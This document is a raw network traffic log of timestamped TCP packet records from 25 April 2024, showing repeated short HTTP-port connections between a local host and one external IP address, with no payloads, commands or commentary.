Apr 25, 2024 09:43:30.139564991 CEST	80	49821	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:30.139586926 CEST	80	49821	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:30.139645100 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.139645100 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.139719963 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.146388054 CEST	80	49821	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:30.146440983 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.146583080 CEST	80	49821	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:30.146626949 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.146697998 CEST	80	49821	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:30.146738052 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.146894932 CEST	80	49821	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:30.146938086 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.147095919 CEST	80	49821	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:30.147138119 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.147156954 CEST	80	49821	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:30.147197962 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.147313118 CEST	80	49821	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:30.147353888 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.265939951 CEST	80	49821	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:30.265963078 CEST	80	49821	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:30.266000986 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.266043901 CEST	49821	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.276083946 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.401904106 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:30.401978016 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.405107021 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.530858994 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:30.530937910 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:30.656737089 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.361849070 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.361907005 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.361955881 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.361972094 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.361999035 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.362015009 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.369494915 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.369558096 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.369570971 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.369616985 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.369694948 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.369740963 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.369793892 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.369839907 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.369925976 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.369971037 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.370008945 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.370049953 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.370086908 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.370131016 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.487953901 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.488003969 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.488007069 CEST	80	49822	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.488048077 CEST	49822	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.506458044 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.632170916 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.632249117 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.634110928 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.759891033 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:31.759985924 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:31.885970116 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.594166040 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.594182968 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.594274998 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.594363928 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:32.594414949 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.594456911 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:32.594497919 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:32.594516039 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.594567060 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:32.604420900 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.604487896 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:32.604782104 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.604830980 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:32.604861975 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.604928017 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:32.604990005 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.605041027 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:32.605087042 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.605138063 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:32.720369101 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.720387936 CEST	80	49823	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.720429897 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:32.720483065 CEST	49823	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:32.727437973 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:32.854620934 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.854727030 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:32.856501102 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:32.984142065 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:32.984330893 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:33.111433983 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.032939911 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.032960892 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.033021927 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.033060074 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.033122063 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.033159018 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.033166885 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.033195019 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.041162014 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.041213989 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.041817904 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.041865110 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.042032957 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.042079926 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.042083025 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.042126894 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.042227983 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.042273998 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.042278051 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.042320013 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.160240889 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.160264015 CEST	80	49824	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.160299063 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.160315037 CEST	49824	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.177407026 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.303337097 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.303558111 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.305329084 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.431257010 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:34.431329966 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:34.559037924 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.267355919 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.267420053 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.267494917 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.267497063 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.267558098 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.267559052 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.276050091 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.276122093 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.276364088 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.276415110 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.276539087 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.276590109 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.276633024 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.276681900 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.276987076 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.277004957 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.277036905 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.277070999 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.277136087 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.277187109 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.396418095 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.396440983 CEST	80	49825	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.396473885 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.396508932 CEST	49825	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.430095911 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.560364962 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.560461044 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.562439919 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.692410946 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:35.692501068 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:35.822489977 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.506069899 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.506160021 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.506186962 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.506289005 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.506342888 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.506400108 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.516060114 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.516165018 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.516546011 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.516599894 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.516798973 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.516851902 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.516978979 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.517031908 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.517076015 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.517131090 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.517198086 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.517224073 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.517249107 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.517297983 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.636271954 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.636344910 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.636383057 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.636401892 CEST	80	49826	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.636430025 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.636452913 CEST	49826	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.647015095 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.803576946 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.803677082 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.805880070 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:36.933392048 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:36.933487892 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:37.060868979 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:40.748475075 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:40.748600006 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:40.748656988 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:40.748936892 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:40.749020100 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:40.749048948 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:40.749089003 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:40.749372959 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:40.749413013 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:40.749569893 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:40.749603987 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:40.749623060 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:40.749654055 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:40.758192062 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:40.758240938 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:40.758508921 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:40.758626938 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:40.758635998 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:40.758677006 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:40.876540899 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:40.876562119 CEST	80	49827	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:40.876611948 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:40.876611948 CEST	49827	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:40.881581068 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:41.012154102 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:41.012268066 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:41.014214039 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:41.144867897 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:41.145092964 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:41.275973082 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.280194998 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.280249119 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.280489922 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.280658960 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.280909061 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.280987024 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.288948059 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.289046049 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.289463997 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.289536953 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.289578915 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.289643049 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.289697886 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.289761066 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.289897919 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.289948940 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.289958954 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.289964914 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.290014029 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.290045023 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.412659883 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.412686110 CEST	80	49828	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.412729025 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.412729025 CEST	49828	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.435121059 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.564781904 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.565001011 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.568420887 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.697926044 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:42.698106050 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:42.827668905 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.526289940 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.526346922 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.526401043 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:43.526410103 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.526438951 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:43.526448965 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:43.535242081 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.535276890 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:43.535674095 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.535712957 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:43.535784006 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.535821915 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:43.535896063 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.535927057 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:43.536047935 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.536063910 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.536079884 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:43.536094904 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:43.536154032 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.536190987 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:43.655865908 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.655884027 CEST	80	49829	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.655929089 CEST	49829	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:43.662962914 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:43.796571970 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.796772957 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:43.798729897 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:43.932121992 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:43.932180882 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:44.065757036 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:44.762820005 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:44.762876034 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:44.762922049 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:44.762923002 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:44.762947083 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:44.762973070 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:44.771212101 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:44.771260023 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:44.771611929 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:44.771663904 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:44.771673918 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:44.771709919 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:44.771819115 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:44.771856070 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:44.771982908 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:44.772031069 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:44.772037983 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:44.772075891 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:44.772108078 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:44.772147894 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:44.896233082 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:44.896423101 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:44.896471977 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:44.896579027 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:44.896620035 CEST	80	49830	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:44.896729946 CEST	49830	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:45.027395964 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:45.027507067 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:45.029470921 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:45.160655022 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:45.160764933 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:45.291928053 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:45.973225117 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:45.973303080 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:45.973376989 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:45.973407984 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:45.973458052 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:45.973458052 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:45.982270956 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:45.982337952 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:45.982592106 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:45.982641935 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:45.982779026 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:45.982827902 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:45.982985020 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:45.983033895 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:45.983175039 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:45.983191967 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:45.983223915 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:45.983254910 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:45.983375072 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:45.983422041 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:46.104957104 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:46.105017900 CEST	80	49831	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:46.105046988 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:46.105065107 CEST	80	49831	45.77.223.48	192.168.2.4
